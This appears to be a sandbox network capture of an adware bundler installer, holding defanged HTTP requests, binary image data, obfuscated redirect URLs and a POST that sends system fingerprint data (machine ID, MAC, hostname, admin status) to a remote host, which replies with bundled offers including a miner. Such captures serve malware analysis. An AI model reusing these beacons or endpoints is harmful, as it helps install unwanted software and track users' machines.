..<html><head>..        <meta charset="utf-8">..    
    <meta name="description" content="">..        <meta name=
"viewport" content="width=device-width, initial-scale=1">..        
<title>Thank You Page</title>..        <link rel="style
sheet" href="assets/css/style.css">..    <body>..        <
header class="header">..        .<div class="header-top green"&g
t;</div>..        .<div class="header-bottom grey">..     
   ..<h1 class="typ">.............. .... ....................<
;/h1>..        .</div>..        </header>..        <
div id="widget">..            <div class="adnl_zone">..      
          <script type="text/javascript">..                /*<
;![CDATA[*/..                supp_key = "575f4f5e34f49079faeab77365968
081";..                supp_time = new Date().getTime();..            
    supp_channel = "";..                supp_code_format = "ads-sync.j
s";..                supp_click = "";..                supp_custom_par
ams = {};..                /*]]>*/..                </script>
..                <script type='text/javascript' src='//VVV.1-1ads.
com/js/show_ads_supp.js?pubId=907'></script>..            <
;/div>..        </div>..        <footer class="footer gree
n">..        .<div class="container">..        ..<h3 class
="green">.......... .................., .......... ................
.. ....................:</h3>..        ..<ul class="steps
<<< skipped >>>

GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon1-green.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.deliverydlcenter.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: image/png

Content-Length: 3392

Connection: keep-alive

Date: Sun, 09 Oct 2016 07:51:21 GMT

Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT

ETag: "122fe75beae30ff3ea83688e03402879"

Accept-Ranges: bytes

Server: AmazonS3

Age: 21766

X-Cache: Hit from cloudfront

Via: 1.1 3283735112d0a322451d32ef038129c9.cloudfront.net (CloudFront)

X-Amz-Cf-Id: mqDE5f1cJUqDWWnBztRVvUPSfx0FhTIBHklKE_TIGcg6Tv-Fe1r4fg==
.PNG........IHDR...>...E......$UF....tEXtSoftware.Adobe ImageReadyq
.e<....IDATx..[{l[W.?..g..fvR.]..2.4.z.N..?jOC......C....IS[....%Y.
...........i].@..c.@.?Hs%.:&.....&..c.............#YIS...;.w.....cB.O.
.....GE.l.3.n7.2Rv..FQ..JF. ...Lt.....?..m.cN...'yK...k..Y..l.........
.j...qO:.?.......n...8K........K7<9X.db.$.....b.............=-.....
...<uhB..2......-/VI.Hzy.$."..?y...<.....-.iF..x.. ...N..ke....)
......!._.mJc..p,a.Z.Gd.x.(...p.......j....~3.. .I..a....~4...S...NN0f
.W..2.I.....t....i`..1d.6....E...^.oKGb$qm.}..;.f...g...h%x..t.K ..'..
.....(X...W.:...]#.p......>.._;.>j..{..V.(k.W...O\....oj..^.....
K.lq>.<.......eJ........?..Yp.`.Ic........F............OV.../...
n.....u.3...F..`... .....oj..b.......7"..;]i.B.. ...K.A{..W.^.g....9..
?}..p....R.M....i..N.D....;......QK..,".....9.....ub>...P.....g:9/.
..:?.y?..a8...L....L.b.s............W...O|.S...w*...3=..J.,...:...3ok.
.mz....W....E.S.F.N...99K.v.S.P.......].!ey:]#C..!.8 .W...D;dq.......&
gt;;...|Y.,3D.Gq.Mg.D..i.|..X.......[.@.s8.8sVD.*cYmj.=.3..2........W.
..vw...fy9^.....z......pEQ. ...Q....T....#.[/..t.0z.h!..>t.....%".B
l.{.<.{.JW.....?.3h.{w...(...DF..p...dV.}X....PJ...n.A.....o. p.(..
........H..3....H...N....F)p8....$.......Y....z:Tn.....W.q....6..D..G.
Ud.f.....C.X....D......N..{..T.j......../."..=...g..)..<(hwX.rf...0
...Z=J..=....1B..n.$U\.P.re.ku.u&8.nC.........W........so..../.O5...G.
....OB#%...x...~..`.;.....^.m."...........q..S]..T.....Fj)>...|.jZ.
..['.....:.s.x..O.m.....[....\$0..{..&.r...^.U...?.o..Y.......ZW].
<<< skipped >>>

GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css HTTP/1.1

Accept: text/css

Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.deliverydlcenter.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/css

Content-Length: 1967

Connection: keep-alive

Date: Sun, 09 Oct 2016 07:51:20 GMT

Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT

ETag: "92657668b4257695bd2699a787aee60b"

Accept-Ranges: bytes

Server: AmazonS3

Age: 22743

X-Cache: Hit from cloudfront

Via: 1.1 c40ee2288a7db28fefd61c3f2ec7ccd7.cloudfront.net (CloudFront)

X-Amz-Cf-Id: aZenwyDwSJjrF7MTHq9s1cCgEp0TvaneRIB31Edl8fIzU6bZbFLUAg==
body{...margin: 0;...padding: 0;...font-family: Helvetica, Arial, sans
-serif;..}..h1{...margin: 0;...font-size: 28px;...font-weight: normal;
...text-align: center;...color: #333;..}...container{...margin: 0 auto
;...width: 980px;...padding-left: 20px;...padding-right: 20px;..}...he
ader h1.typ{...line-height: 80px;...padding-top: 0;..}...header h1{...
padding-top: 13px;..}...header h1 span{...display: block;...font-size:
 14px;..}...header-top, .header-bottom{...position: relative;...height
: 80px;...width: 100%;..}...header-top.green{...background: #22B573;..
}...header-top.blue{...background: #0461C9;..}...header-bottom.grey{..
.background: #CCCCCC;..}...header-bottom.light-blue{...background: #B6
D2F2;...border-bottom:1px solid #02294C;..}..#widget{...margin: 0 auto
;...margin-top: 50px;...margin-bottom: 150px;..}...footer{...position:
 relative;...width: 100%;...height: 216px;...background: #e5e5e5;...bo
rder-top: 1px solid #fff;...-webkit-box-sizing: border-box;...-moz-box
-sizing: border-box;...box-sizing: border-box;..}...footer:before{...p
osition: absolute;...left: 0;...right: 0;...top: -2px;...height: 1px;.
..width: 100%;...content: '';.....}...footer.green:before{...backgroun
d: #0F4C2E;..}...footer.blue:before{...background: #02294C;..}...foote
r h3{...margin-top: 38px;...margin-bottom: 28px;...font-size: 18px;...
text-align: center;...text-shadow: -1px 1px 0 #fff;..}...footer h3.gre
en{...color: #22B573;..}...footer h3.blue{...color: #0461C9;..}..ul.st
eps{...margin: 0;...padding: 0;...list-style-type: none;..}..ul.st
<<< skipped >>>

GET /favicon.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: ic-dc.deliverydlcenter.com

Connection: Keep-Alive

HTTP/1.1 403 Forbidden

Content-Type: application/xml

Transfer-Encoding: chunked

Connection: keep-alive

Date: Wed, 07 Jun 2017 01:14:37 GMT

Server: AmazonS3

Age: 25

X-Cache: Error from cloudfront

Via: 1.1 c40ee2288a7db28fefd61c3f2ec7ccd7.cloudfront.net (CloudFront)

X-Amz-Cf-Id: nfq2-HC_xCoPHAKqht4XMWTizCOSXd4y0X1xYbMzg1R-QeEaLWu9zg==
f3..<?xml version="1.0" encoding="UTF-8"?>.<Error><Code
>AccessDenied</Code><Message>Access Denied</Message&
gt;<RequestId>16BEF359AC4774DF</RequestId><HostId>OA
h0Ih//pzuS9lhyZbo6OTiP8F7WRjqSXcUU8Zh1ZWyb4Ug9QMz4 7WLqOcPT/qxZZ7VIpuI
o8E=</HostId></Error>..0..HTTP/1.1 403 Forbidden..Content-
Type: application/xml..Transfer-Encoding: chunked..Connection: keep-al
ive..Date: Wed, 07 Jun 2017 01:14:37 GMT..Server: AmazonS3..Age: 25..X
-Cache: Error from cloudfront..Via: 1.1 c40ee2288a7db28fefd61c3f2ec7cc
d7.cloudfront.net (CloudFront)..X-Amz-Cf-Id: nfq2-HC_xCoPHAKqht4XMWTiz
COSXd4y0X1xYbMzg1R-QeEaLWu9zg==..f3..<?xml version="1.0" encoding="
UTF-8"?>.<Error><Code>AccessDenied</Code><Mess
age>Access Denied</Message><RequestId>16BEF359AC4774DF&
lt;/RequestId><HostId>OAh0Ih//pzuS9lhyZbo6OTiP8F7WRjqSXcUU8Zh
1ZWyb4Ug9QMz4 7WLqOcPT/qxZZ7VIpuIo8E=</HostId></Error>..0.
.

GET /?gfe_rd=cr&ei=mVM3Wdr1CMXR8gf1_ppA HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.google.com.ua

Connection: Keep-Alive

HTTP/1.1 302 Found

Location: hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=mVM3Wdr1CMXR8gf1_ppA&gws_rd=ssl

Cache-Control: private

Content-Type: text/html; charset=UTF-8

P3P: CP="This is not a P3P policy! See hXXps://VVV.google.com/support/accounts/answer/151657?hl=en for more info."

Date: Wed, 07 Jun 2017 01:15:05 GMT

Server: gws

Content-Length: 276

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Set-Cookie: NID=105=OvSIdM7yuFFxNKFD3dTOwuqTiwq1BUgE7_dXFCdGwVAsmwL1fW5tTJJuXRzam1Kn2FWowYnrqlwLA34vFkGJrr9G2Z8tGJtHHUdo2EGvENiBBJeE_8FXzDtEtaHExxGw; expires=Thu, 07-Dec-2017 01:15:05 GMT; path=/; domain=.google.com.ua; HttpOnly
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=mVM3Wdr1CMX
R8gf1_ppA&gws_rd=ssl">here</A>...</BODY></HTML&g
t;..HTTP/1.1 302 Found..Location: hXXps://VVV.google.com.ua/?gfe_rd=cr
&ei=mVM3Wdr1CMXR8gf1_ppA&gws_rd=ssl..Cache-Control: private..Content-T
ype: text/html; charset=UTF-8..P3P: CP="This is not a P3P policy! See 
hXXps://VVV.google.com/support/accounts/answer/151657?hl=en for more i
nfo."..Date: Wed, 07 Jun 2017 01:15:05 GMT..Server: gws..Content-Lengt
h: 276..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..
Set-Cookie: NID=105=OvSIdM7yuFFxNKFD3dTOwuqTiwq1BUgE7_dXFCdGwVAsmwL1fW
5tTJJuXRzam1Kn2FWowYnrqlwLA34vFkGJrr9G2Z8tGJtHHUdo2EGvENiBBJeE_8FXzDtE
taHExxGw; expires=Thu, 07-Dec-2017 01:15:05 GMT; path=/; domain=.googl
e.com.ua; HttpOnly..<HTML><HEAD><meta http-equiv="conte
nt-type" content="text/html;charset=utf-8">.<TITLE>302 Moved&
lt;/TITLE></HEAD><BODY>.<H1>302 Moved</H1>.
The document has moved.<A HREF="hXXps://VVV.google.com.ua/?gfe_rd=c
r&ei=mVM3Wdr1CMXR8gf1_ppA&gws_rd=ssl">here</A>...<
/BODY></HTML>....
<<< skipped >>>

GET /wEaZwFrowCToRAEIhSTxlTRwSKkwiQ8kxCG1hDxYSAsMVA7gAG3whFPgxC_UzEQ0xI0MSLxghS9UUCI0hJwUiNjQABC0SIX9RArgjPCpzWvAkM_8SF8wTOJ4QOSAiPOcRSbxiH54hAI0gGzQzXl0xQb9AEf4UWY11BBYiFGIgWflkQE11SMlEHHcyAEEwQEt0VCRlQNZ1XBBUTGIBEHEVXaNgHAURHLxUSd4RAVMlXDZgBGQgAbUhBYABFmEkUbFhHQYRUHZ1QaUwAK4xC8wlQQQxG2kgFCEVPuEEK5YyLrQkRRQwCs0gERgUL_YkKrAjM44zI9kjUSYBBmEgCCwlVRF1TJdBGnURDVY1VQdkWFpQE-MwFH4gBQNBPR8hBD9zFAAgRY0xFUUhGdEhAA5AGCMRDZMRBd1zR1UFAXMQEFZVQW0hFKVlVCRkSLlkTSpAAFkEVMl0QLB1EN8RTLozY3l3ZsNmevNGa5R3cxh3crRHculmdrhnb4FWcyFGap9Gc HTTP/1.1

User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)

Host: goodreason.top

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 302 Moved Temporarily

Server: nginx/1.12.0

Date: Wed, 07 Jun 2017 01:14:50 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.17

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Wed, 07 Jun 2017 01:14:50 GMT

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Pragma: no-cache

Location: hXXp://aleph.comparent.ru/8gVdhESIJ1QEglEMggWYwgCehFCH90GNQBTctBQfcVQCkVVTh0BeYAG5sQHNwgJAsRFBcRHmMAGTIQVFh1UbpwGfohMaEBGD0BEz8BELswUN5VTLRgBQwRGDghMTYBEK0xFC0hJSoAGNITTFsAHN0hAQwUQFJ0WFwRHAciHX0QFO4QGMUjHcEANVcgMORBGbYgBF4wWVZkFHQDHKABHIggDVpVXZNhOk4TIadTEKE1BbwyPBATUAozGfgyAD8BCK0jIIExA2MDKj8zBaNyXB8RBroCOsIzCBgwN140FK4SI2AUPRJDUswzJJ0jMlgwAkEBLh0hGAFFNJ8TEFoRBS4iPRJyHHBUAHogVWp1Sd0gLDgBBLZ0SPtFWER1TQEhJMcwBOR1WBZlRUllRah0UbpQEP0xTYpVCbYQEfo1QbFQAYkRVFh0BWYwHHIQAVwgCAsjVWpFHUUwHDFUVa5RBM4QDDoCUHpBDd0iEKkxX90CXq4iPlkCVL1gHVEzCSkxXqsTW-0TMq0SPjgzJUhAHKATDA8wSNpEQY9EEFcyHfUwVYRlRYdVDQATGDgwCbckGxQhENcVJUsgEPxgHN8ABQkhDUAkCaEhENMhBYcVJWhzSRkxABg0UbNQGTwUQWlETcpkVWpVHQcxUN9kRLB1SLoQHEVhOtRHe55mc0xGe5lHZxFWb3lmapl3brZmb
0..HTTP/1.1 302 Moved Temporarily..Server: nginx/1.12.0..Date: Wed, 07
 Jun 2017 01:14:50 GMT..Content-Type: text/html..Transfer-Encoding: ch
unked..Connection: keep-alive..X-Powered-By: PHP/5.4.17..Expires: Mon,
 26 Jul 1997 05:00:00 GMT..Last-Modified: Wed, 07 Jun 2017 01:14:50 GM
T..Cache-Control: no-store, no-cache, must-revalidate..Cache-Control: 
post-check=0, pre-check=0..Pragma: no-cache..Location: hXXp://aleph.co
mparent.ru/8gVdhESIJ1QEglEMggWYwgCehFCH90GNQBTctBQfcVQCkVVTh0BeYAG5sQH
NwgJAsRFBcRHmMAGTIQVFh1UbpwGfohMaEBGD0BEz8BELswUN5VTLRgBQwRGDghMTYBEK0
xFC0hJSoAGNITTFsAHN0hAQwUQFJ0WFwRHAciHX0QFO4QGMUjHcEANVcgMORBGbYgBF4wW
VZkFHQDHKABHIggDVpVXZNhOk4TIadTEKE1BbwyPBATUAozGfgyAD8BCK0jIIExA2MDKj8
zBaNyXB8RBroCOsIzCBgwN140FK4SI2AUPRJDUswzJJ0jMlgwAkEBLh0hGAFFNJ8TEFoRB
S4iPRJyHHBUAHogVWp1Sd0gLDgBBLZ0SPtFWER1TQEhJMcwBOR1WBZlRUllRah0UbpQEP0
xTYpVCbYQEfo1QbFQAYkRVFh0BWYwHHIQAVwgCAsjVWpFHUUwHDFUVa5RBM4QDDoCUHpBD
d0iEKkxX90CXq4iPlkCVL1gHVEzCSkxXqsTW-0TMq0SPjgzJUhAHKATDA8wSNpEQY9EEFc
yHfUwVYRlRYdVDQATGDgwCbckGxQhENcVJUsgEPxgHN8ABQkhDUAkCaEhENMhBYcVJWhzS
RkxABg0UbNQGTwUQWlETcpkVWpVHQcxUN9kRLB1SLoQHEVhOtRHe55mc0xGe5lHZxFWb3l
mapl3brZmb..0..
<<< skipped >>>

POST /index.php HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: VVV.secularistsarakolet.site

Content-Length: 525

Connection: Keep-Alive

Cache-Control: no-cache

Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=E291391DB74F012279E9F3BF8D04972B&Sysid1=0AA3CCA3804F416BF2B3CF33421EF1E6&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__21223_il2.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=Setup__21223_il2&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDAwQzI5QUY3MUE3MDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1496798103&ver=1.1.5.26
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Wed, 07 Jun 2017 01:15:05 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

transfer-encoding: chunked

Connection: keep-alive
37c1....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//
EN">.<html>.    <head>.        <meta http-equiv="con
tent-type" content="text/html; charset=UTF-8" /> .        <title
>DownloadManagerModern</title>...<script type="text/javasc
ript">...  var g_notCompatibleWithUpdaterComps = ['LootFindKP'];...
  var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDub
a',  'UCwebAccelerator', 'UltimateSecurityPackage' ,  'TotalSecurity',
 'TotalSecurityIN', 'TotalSecurityRU'];...</script> .        <
;base href="hXXp://VVV.secularistsarakolet.site:80/index.php" />.&l
t;link rel="stylesheet" type="text/css" href="hXXp://cdn2.downloadjell
y.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" />        <
script type="text/javascript" src="hXXp://cdn1.downloadjelly.com/V39/a
mipb.js"></script>.        <script type="text/javascript"&
gt;.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.png
";..var g_r_appname="installer";..var g_r_cmdline="\/S";..var g_z_none
1 = 'InitNone1';..var g_z_none2 = 'InitNone2';..var g_z_ti = 'N/A';..v
ar g_z_ti1 = 'N/A';..var g_z_ti2 = 'N/A';..var g_z_ti3 = 'N/A';..var g
_z_ti4 = 'N/A';..var g_z_ti5 = 'N/A';..var g_z_ti6 = 'N/A';..var g_z_c
lickId = '';..g_z_none2 = '';..            var g_amiobj = '', g_ami, g
_updb = false, g_close = '0', g_additional_offer_list = '1';.         
   var g_finish_install_button = '1';.            var g_popup_install_
all = '0';.            var g_eula = 'VGhlIGRvd25sb2FkIGFuZCBpbnN0Y
<<< skipped >>>

POST /finalize.php HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: VVV.secularistsarakolet.site

Content-Length: 695

Connection: Keep-Alive

Cache-Control: no-cache

_hdn=0&_ver=1.1.5.26&_p=1&_s=2&_cc=UA&_cid=21223&_psb=0&_cnt=69c486a8c6b340ebbe27e3dba0d7b457&_instid=l2&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_DownloadManagerModern=0&r_SnapDoNew=3&r_Xtex=5&r_VlngpMiner=3&r_UltimateSecurityPackageTest=0.01&r_DiskPower=2&r_PcCleanPlusBM=1&r_Speedownloader=3&r_YouTubeAdblock=2&r_BestZiper=2&r_YeaDesktop=4&r_YeaDesktopWW=3&r_WiseFolderLock=2&r_NoterSave=3&r_BrowserAirDemo=0.01&r_YesSearches=1&DownloadManagerModern=3&SnapDoNew=1&Xtex=1&VlngpMiner=1&UltimateSecurityPackageTest=1&DiskPower=1&PcCleanPlusBM=1&Speedownloader=1&YouTubeAdblock=1&BestZiper=1&YeaDesktop=1&YeaDesktopWW=1&WiseFolderLock=1&NoterSave=1&BrowserAirDemo=1&YesSearches=4
HTTP/1.1 200 OK

Content-Type: text/xml

Date: Wed, 07 Jun 2017 01:15:07 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

Content-Length: 4843

Connection: keep-alive
....<Array><page><f>1</f><fb>9</fb>
;<pt>0</pt><cats>0</cats><updh>1</upd
h><wrn></wrn><comps>DownloadManagerModern</com
ps><short_name>DownloadManagerModern</short_name><mu
st_show>0</must_show><bdy>CjxkaXYgaWQ9ImFtaV9kX21hbmFnZ
XJfYm9keSI Cgk8ZGl2IGlkPSJhbWlfbGVmdF9pbWFnZSI CQoJCTxpbWcgaWQ9ImFtaV9
pbWFnZXVybCIgc3JjPSJodHRwOi8vcGUtc2l4aS5jb20vaW1nL2ljb25faW5zdGFsbGVyL
nBuZyIgLz4KCQk8ZGl2IGlkPSJhbWlfbGVmdF9saW5rcyI CQoJCQk8YSBocmVmPSJodHR
wOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS9wcml2YWN5Lmh0bWwgIiB0YXJnZXQ9Il9ibGFua
yIgc3R5bGU9ImNvbG9yOiB3aGl0ZSI UHJpdmFjeSBQb2xpY3k8L2E PGJyIC8 CgkJCTx
hIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL2V1bGEuaHRtbCIgdGFyZ2V0P
SJfYmxhbmsiIHN0eWxlPSJjb2xvcjogd2hpdGUiPkVuZCBVc2VyIExpY2Vuc2UgQWdyZWV
tZW50PC9hPjxiciAvPgoJCQk8YSBocmVmPSJodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvb
S9jb250YWN0LXVzLmh0bWwiIHRhcmdldD0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXR
lIj5Db250YWN0IHVzPC9hPgoJCTwvZGl2PgoJPC9kaXY Cgk8ZGl2IGlkPSJhbWlfYm9ke
V90ZXh0Ij4KCQk8ZGl2IGlkPSJhbWlfZGVjX2RpdiI CgkJCTxzcGFuIGlkPSJhbWlfZGV
jX3RpdGxlIj5TZXR1cCA8Yj5pbnN0YWxsZXI8L2I PC9zcGFuPgkJCgkJCTxzcGFuIGlkP
SJhbWlfZGVjX25vdGUiPlRoZSBkb3dubG9hZCBhbmQgaW5zdGFsbGF0aW9uIHByb2Nlc3M
gb2YgdGhpcyBmaWxlIGlzIHJ1biBieSA8YSBocmVmPSJodHRwOi8vd3d3Lmluc3RhbGxwY
XRoLmNvbS9pbmRleC5odG1sIiB0YXJnZXQ9Il9ibGFuayI SW5zdGFsbFBhdGggSW5zdGF
sbCBNYW5hZ2VyPC9hPiwgVG8gY29udGludWUgaW5zdGFsbGluZyB0aGUgcHJvZHVjdCwgY
2xpY2sgb24gdGhlIE5leHQgYnV0dG9uLjwvc3Bhbj4KCQk8L2Rpdj4KCQkJCQoJCTx
<<< skipped >>>

GET /Html/867fdcc0-763f-4284-b64c-78c38739d5da/logo.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.secularistsarakolet.site/index.php

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: VVV.secularistsarakolet.site

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: image/png

Date: Wed, 07 Jun 2017 01:15:07 GMT

ETag: "22954-ac5b-550f4caa8deaf"

Last-Modified: Fri, 02 Jun 2017 07:06:25 GMT

Server: Apache/2.2.15 (Red Hat)

Content-Length: 44123

Connection: keep-alive
.PNG........IHDR...B...r......B......gAMA....|.Q.... cHRM...........R.
..@..}y......<.....s<.w...9iCCPPhotoshop ICC profile..H...wTT...
..wz..0.R......{.^Ea..`(..34.!...ED."HP...P$VD...T..$.(1.ET,oF........
...o........Z..../...K......<....Qt.....`.).LVF._.{.......!r._...zX
..p..3.N....Y.|.......9.,...8%K........,f.%f.(A...9a..>.,.....<.
..9..S.b....L!G.....3..,....F.0. .7..T.3...Il.pX."6.1...."....H._q.W,.
d...rIK..s...t.......A..d.p....& ..g.].R........Y2...EE.4...4432..P.u.
oJ..Ez...g..........`..j...-....-....b.8....o.....M</..A...qVV....2
.....O.....g$>....]9.La..... -%M..g.3Y.........u..A.x....E.....K...
....i<:................Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%..
.9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3
h..A'8...K....n..`.L.g`......a!2D..!.H.... .d..A.P....B....By.f..*...z
....:....@..]h...~....L.............C.Up........p%....;...5.6<.?...
......."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7
Qc.Y.G4....G.......t...].nB../.o.'..1.......xb"1I.....>L...f.3...b.
.X}..........*.Q.Y..v...G....p..(............&q.x).&....g.s...F|7.:~..
@.&h...!.$.&B%..p.....H$.....D.q#..x.x.8F|K.!..\H.$!i........%.L.";...
...r3.......E.H.K.-.A.F.CbH..$^RS.Ir.d.d......3Rx)-).)..z....R#Rs..iSi
..T...#.W..d.2Z2n2l....2.d.).E..BaQ6S.).).T.U..EM..S...Pgeed....f.....
..!4-..-.VJ;N...[...i.g..%.K....-.s.........{'O.w.O..%.).P........._..
..R.R....EK./... .).).U<...8.......T.tAiF......\.|FyZ..b..U)W9....K
w... ...YUEUOU.j.......Z.Z.Z..Cu.:C=^.\.G}VCE.O#O.E..&^.....W.Os^K
<<< skipped >>>

GET /pr/public/css/style.css HTTP/1.1

Accept: text/css

Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ic-dc.bundlessafevault.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: text/css

Content-Length: 1472

Connection: keep-alive

Date: Thu, 22 Sep 2016 19:33:59 GMT

Last-Modified: Thu, 21 Jul 2016 07:28:41 GMT

ETag: "d87938f58e3b40da8272e3eb0c1b47d3"

Accept-Ranges: bytes

Server: AmazonS3

Age: 17492

X-Cache: Hit from cloudfront

Via: 1.1 e1f6fa82d37f125cb361c7c37faf6662.cloudfront.net (CloudFront)

X-Amz-Cf-Id: NrpxSQo6xQJAivEKDxmIttR4qlwQYaUTgeWGmXj5AMsLum4aLWQ5MA==
body {.  padding: 0;.  margin: 0;.  background-color: white;.  font-fa
mily: arial, sans-serif;.  color: #0b0b0b; }...wrapper {.  position: a
bsolute;.  top: 0;.  bottom: 0;.  left: 0;.  right: 0; }.  .wrapper .h
eader {.    height: 294px;.    margin: 0 auto;.    background-color: #
0b0b0b; }.    .wrapper .header .title {.      color: white;.      text
-align: center; }.      .wrapper .header .title .title-caption, .wrapp
er .header .title .title-caption-inter {.        text-align: center;. 
       font-style: italic;.        font-weight: 600;.        font-size
: 38px;.        line-height: 103px; }.      .wrapper .header .title .t
itle-caption-inter {.        line-height: 40px;.        padding-top: 3
0px; }.      .wrapper .header .title .title-description {.        font
-size: 20px;.        padding-top: 10px;.        width: 615px;.        
margin: 0 auto;.        font-style: italic; }.  .wrapper .content {.  
  text-align: center;.    margin: 0 auto;.    height: 654px;.    backg
round-color: white; }.    .wrapper .content .inner, .wrapper .content 
.inner-typ {.      top: -191px;.      margin: 0 auto;.      position: 
relative;.      width: 800px;.      height: 440px;.      border: 20px 
solid #bfccd2;.      background-color: white; }.    .wrapper .content 
.inner-typ {.      top: -140px; }.    .wrapper .content .adnl_zone {. 
     position: absolute;.      background-color: #bfccd2;.      margin
: auto;.      top: 0;.      right: 0;.      left: 0;.      bottom: 0; 
}...
<<< skipped >>>

GET /ads-async.js?v=1&key=3a71f57f6d976f956c5f61dbdd4adf7b&tarId=3a71f57f6d976f956c5f61dbdd4adf7b_sync&cIds=&adsCampaignKey=1496798089125&ch=&click=&tz=3&t=1496798091303&requestUrl=http://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html&flashVer=23.0 r0&inDapIF=false&supp_width=320&supp_height=50&scrWidth=1916&scrHeight=902 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://ic-dc.bundlessafevault.com/pr/3e07b12e-e7d1-11e6-836f-02e33f60d095/typ_1.html

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: VVV.1-1ads.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Access-Control-Allow-Origin: *

Cache-Control: no-cache

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

P3P: CP="CAO PSA OUR"

